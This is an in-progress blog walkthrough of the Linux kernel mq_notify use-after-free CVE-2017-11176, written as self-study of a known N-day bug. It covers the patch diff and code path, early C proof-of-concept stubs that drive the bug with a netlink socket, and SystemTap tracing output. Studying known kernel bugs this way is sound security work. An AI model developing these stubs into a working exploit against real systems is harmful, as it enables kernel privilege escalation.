[ON-GOING] CVE-2017-11176 N-Day Walkthrough
2024-08-24
Intro
With courses completed, books read, and even more training under my belt, I’ve been eager to get my hands dirty and dive into kernel exploitation with a walkthrough of CVE-2017-11176.
I’ve taken several courses:
- Heap Labs (Parts 1-3)
- OSED
- RET2System Wargames
And I’ve read:
- A guide to Kernel Exploitation: Attacking the Core (E. Perla, M. Oldani)
It’s been recommended quite often that a great way to find kernel bugs is to first review older vulnerabilities. The idea is to start with one that’s well-documented to understand the process, then tackle one that’s less documented, and finally, start finding your own. This seems like solid advice, and with some lab practice completed, it makes sense to now apply what I’ve learned.
With that in mind, this CVE has been thoroughly documented in Lexfo’s security blog. It’s split into three parts: analyzing the patch diff, obtaining a primitive write, and achieving a full exploit. This seems like the perfect candidate to guide me through this as if it were an actual N-day vulnerability. I’ll be documenting the entire process here in this blog post. Enjoy!
Core Concepts, Context, Analysis
Go over the basics of everything Kernel to understand the vulnerability.
Process Desscriptor task_struct
Each process has a task_struct
that hold crucial information, this is true for userland and the kernel.
struct task_struct {
volatile long state; // process state (running, stopped, ...)
void *stack; // task's stack pointer
int prio; // process priority
struct mm_struct *mm; // memory address space
struct files_struct *files; // open file information
const struct cred *cred; // credentials
// ...
};
File Descriptors, Virtual Function Table , and Sockets – oh my!
First off, going over some basics of kernel and structures. That being;
// [include/linux/sched.h]
struct task_struct {
volatile long state;
void *stack;
int prio;
struct mm_struct *mm;
struct files_struct *files;
const struct cred *cred;
// ...
};
VFT which is a structure comprised of function pointers.
struct file_operations {
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
int (*open) (struct inode *, struct file *);
int (*release) (struct inode *, struct file *);
// ...
};
To initiate this code;
if (file->f_op->read)
ret = file->f_op->read(file, buf, count, pos);
Aswell, going over the basics of sockets in Linux, as well the importance of Netlink Socket.
Reference Counters
This keeps track of the number of references an object has to ensure that it won’t lead to Use-after-free’s or cause memory leaks.
- refcounter decreased twice: use-after-free
- refcounter increased twice: memory leak or int-overflow on the refcounter leading to use-after-free
static inline void sock_put(struct sock *sk) {
if (atomic_dec_and_test(&sk->sk_refcnt))
sk_free(sk);
}
refcounter
decreased twice: use-after-free
refcounter
increased twice: memory leak or int-overflow on the refcounter
leading to a use-after-free
Patch diffing
The following patch diff can be seen in the fix:
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index c9ff943f19abc6..eb1391b52c6f84 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
timeo = MAX_SCHEDULE_TIMEOUT;
ret = netlink_attachskb(sock, nc, &timeo, NULL);
- if (ret == 1)
+ if (ret == 1) {
+ sock = NULL;
goto retry;
+ }
if (ret) {
sock = NULL;
nc = NULL;
This is a whole lot of nothing. What I can take away is basically the logic need to hit mqueue.c
and that sock != NULL
can cause a use-after-free. After that, the patch notes itself is pretty verbose, which gives me the following;
- The retry logic for
netlink_attachskb(
) insidesys_mq_notify()
- The sock
refcnt
is already released when retry is needed - The fd is controllable by user-space
- Some type of race condition
The blog also picked up on the following:
- There is something wrong with the sock variable
refcounting
, leading to a use-after-free
The Vulnerable Code
I tried to see if I could spot to issue myself first, I after all, did have all the information available from the previous patch notes.
Some questions to ask are;
- What is the vulnerable syscall?
- what exactly is assumed in the logic?
- What mitigations might have to bypass?
If this code flow hits and sock != NULL
what happens? Well, we go to;
out:
if (sock) {
netlink_detachskb(sock, nc); // <--- Start
} else if (nc) {
dev_kfree_skb(nc);
}
// Next --->
void netlink_detachskb(struct sock *sk, struct sk_buff *skb) {
kfree_skb(skb); // <-- Free's skb
sock_put(sk); // <-- Go here.
}
// Next --->
/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk) {
if (atomic_dec_and_test(&sk->sk_refcnt))
sk_free(sk);
}
Which, in all, just decreases the sk.sk_refcnt
by 1. The blog then asks how can we increment the reference counter by one, which is where it leads to next.
sock = netlink_getsockbyfilp(filp);
Now, how is it initalized/increased by 1?
/*
* Start netlink_getsockbyfilp(f.file);
*/
sock = netlink_getsockbyfilp(f.file);
fdput(f);
/*
* Start netlink_getsockbyfilp(f.file);
* \_netlink_getsockbyfilp
*/
struct sock *netlink_getsockbyfilp(struct file *filp) {
struct inode *inode = file_inode(filp);
struct sock *sock;
if (!S_ISSOCK(inode->i_mode))
return ERR_PTR(-ENOTSOCK);
sock = SOCKET_I(inode)->sk;
if (sock->sk_family != AF_NETLINK)
return ERR_PTR(-EINVAL);
sock_hold(sock);
return sock;
}
/*
* Start netlink_getsockbyfilp(f.file);
* \_netlink_getsockbyfilp
* \_sock_hold
*/
static inline void sock_hold(struct sock *sk) {
atomic_inc(&sk->sk_refcnt); // Increment ref counter by 1.
}
With decreasing and increasing now scoped out, the blog dives into how the vulnerability can be possible. Remembering that this is a race condition, if we close()
the sock midway through the goto retry
method, then we will be able to trigger the UAF.
PoC time
How do we even enter this code path?
From userland to kernel:
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes, const struct sigevent __user *, u_notification) {
int ret;
struct file *filp;
struct sock *sock;
struct inode *inode;
struct sigevent notification;
struct mqueue_inode_info *info;
struct sk_buff *nc;
if (u_notification) { // Condition to pass
if (copy_from_user(¬ification, u_notification,
sizeof(struct sigevent)))
return -EFAULT;
}
Next, the provided userland structure is validated;
nc = NULL;
sock = NULL;
if (u_notification != NULL) { // Not NULL
if (unlikely(notification.sigev_notify != SIGEV_NONE && notification.sigev_notify != SIGEV_SIGNAL && notification.sigev_notify != SIGEV_THREAD)) // No sigev_notify signals
return -EINVAL;
if (notification.sigev_notify == SIGEV_SIGNAL && !valid_signal(notification.sigev_signo)) // No sigev_notify signals {
return -EINVAL;
}
if (notification.sigev_notify == SIGEV_THREAD) { // SIGEV_THREAD is set
long timeo;
/* create the notify skb */
nc = alloc_skb(NOTIFY_COOKIE_LEN, GFP_KERNEL);
if (!nc) {
ret = -ENOMEM;
goto out;
}
if (copy_from_user(nc->data,notification.sigev_value.sival_ptr, NOTIFY_COOKIE_LEN)) { // is valid?
ret = -EFAULT;
goto out;
}
Setup stub for exploit, the exploit fails with -EBADF
. This is in a few places so we’ll need to attack to the kernel to debug. This exploit stub wasn’t too terribly hard to write up, although setting the correct parameters for the structure was interesting.
/*
# gcc -lrt -O0 exploit.c -o pwn
# ./pwn
[ CVE-2017-11176 ]
mq_notify failed: : Bad file descriptor
"-EBADF"
*/
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#define SIGEV_THREAD 2
#define NOTIFY_COOKIE_LEN 32
int main(int argc, char **argv){
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
printf("[ CVE-2017-11176 ]\n");
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
if (mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
printf("\nmqnotify succeed\n");
return 0;
}
System Tap
I’ve never used SystemTap before, so this is all new to me. apparently it’s used for live probing the kernel without going into gdb
. Looks like the mq_notify
is being called as intended with the userland address, and -1
parameters.
(4291-4291) >>> mq_notify (-1, 0x7ffff7129bf0)
(4291-4291) <<< mq_notify = fffffffffffffff7
Hook also other syscall functions that could raise -EBADF
errors.
(6810-6810) >>> mq_notify (-1, 0x7ffe77695d30)
(6810-6810) [uland] ==>> copy_from_user (n=? from=? to=?)
(6810-6810) [skb] ==>> alloc_skb (priority=? size=?)
(6810-6810) [uland] ==>> copy_from_user (n=? from=? to=?)
(6810-6810) [skb] ==>> skb_put (skb=0xffff880036a77f00 len=0x20)
(6810-6810) [skb] <<== skb_put (return=0xffff880036787200)
(6810-6810) [vfs] ==>> fdget (fd=?)
(6810-6810) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88005daa7200)
(6810-6810) [netlink] <<== netlink_getsockbyfilp (return=0xffff88007ad8b800)
(6810-6810) [netlink] ==>> netlink_attachskb (sk=0xffff88007ad8b800 skb=0xffff880036a77f00 timeo=0xffff88007b1a7f08 ssk=0x0)
(6810-6810) [netlink] <<== netlink_attachskb (return=0x0)
(6810-6810) [vfs] ==>> fdget (fd=?)
(6810-6810) [netlink] ==>> netlink_detachskb (sk=0xffff88007ad8b800 skb=0xffff880036a77f00)
(6810-6810) [netlink] <<== netlink_detachskb ()
(6810-6810) <<== mq_notify = fffffffffffffff7
To capture all the different system calls and kernel functions, I used the following system tap file.
$ sudo stap -v mqnotify.stp
probe syscall.mq_notify {
if (execname() == "exploit"){
printf("\n\n(%d-%d) ==> mq_notify (%s)\n", pid(), tid(), argstr)
}
}
probe syscall.mq_notify.return {
if (execname() == "exploit") {
printf("(%d-%d) <<== mq_notify = %x\n\n\n", pid(), tid(), $return)
}
}
probe kernel.function ("fdget"){
if (execname() == "exploit"){
printf("(%d-%d) [vfs] ==>> fdget (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_detachskb"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_detachskb (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_detachskb").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_detachskb (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("netlink_getsockbyfilp"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_getsockbyfilp (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_getsockbyfilp").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_getsockbyfilp (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("netlink_attachskb"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_attachskb (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_attachskb").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_attachskb (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("skb_put"){
if (execname() == "exploit"){
printf("(%d-%d) [skb] ==>> skb_put (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("skb_put").return{
if (execname() == "exploit"){
printf("(%d-%d) [skb] <<== skb_put (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("copy_from_user"){
if (execname() == "exploit"){
printf("(%d-%d) [uland] ==>> copy_from_user (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("alloc_skb"){
if (execname() == "exploit"){
printf("(%d-%d) [skb] ==>> alloc_skb (%s)\n", pid(), tid(), $$parms)
}
}
Call the systemcall directly instead of a wrapper as it’s causing some issues.
// ...
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
// ...
if (_mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
// ...
Trigger the bug
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/netlink.h>
#define _GNU_SOURCE
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)
#define NOTIFY_COOKIE_LEN 32
int main(int argc, char **argv){
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
int sock_fd;
if (( sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_GENERIC)) < 0 ) {
perror("socket failed: ");
return 1;
}
printf("[ CVE-2017-11176 ]\n");
printf("sock_fd created: %d\n", sock_fd);
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
sigev.sigev_signo = sock_fd;
printf("sigev.sival: %p\n", &sigev);
if (_mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
printf("\nmqnotify succeed\n");
return 0;
}
(9766-9766) >>> mq_notify (4294967295, 0x7fff7b8a77a0)
(9766-9766) [uland] ==>> copy_from_user ()
(9766-9766) [skb] ==>> alloc_skb (priority=? size=?)
(9766-9766) [uland] ==>> copy_from_user ()
(9766-9766) [skb] ==>> skb_put (skb=0xffff8800366a9400 len=0x20)
(9766-9766) [skb] <<== skb_put (return=0xffff88003692ac00)
(9766-9766) [vfs] ==>> fdget (fd=?)
(9766-9766) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff8800312a5300)
(9766-9766) [netlink] <<== netlink_getsockbyfilp (return=0xffff8800513ca000)
(9766-9766) [netlink] ==>> netlink_attachskb (sk=0xffff8800513ca000 skb=0xffff8800366a9400 timeo=0xffff88002ea27f08 ssk=0x0)
(9766-9766) [netlink] <<== netlink_attachskb (return=0x0)
(9766-9766) [vfs] ==>> fdget (fd=?)
(9766-9766) [netlink] ==>> netlink_detachskb (sk=0xffff8800513ca000 skb=0xffff8800366a9400)
(9766-9766) [netlink] <<== netlink_detachskb ()
(9766-9766) <<== mq_notify = fffffffffffffff7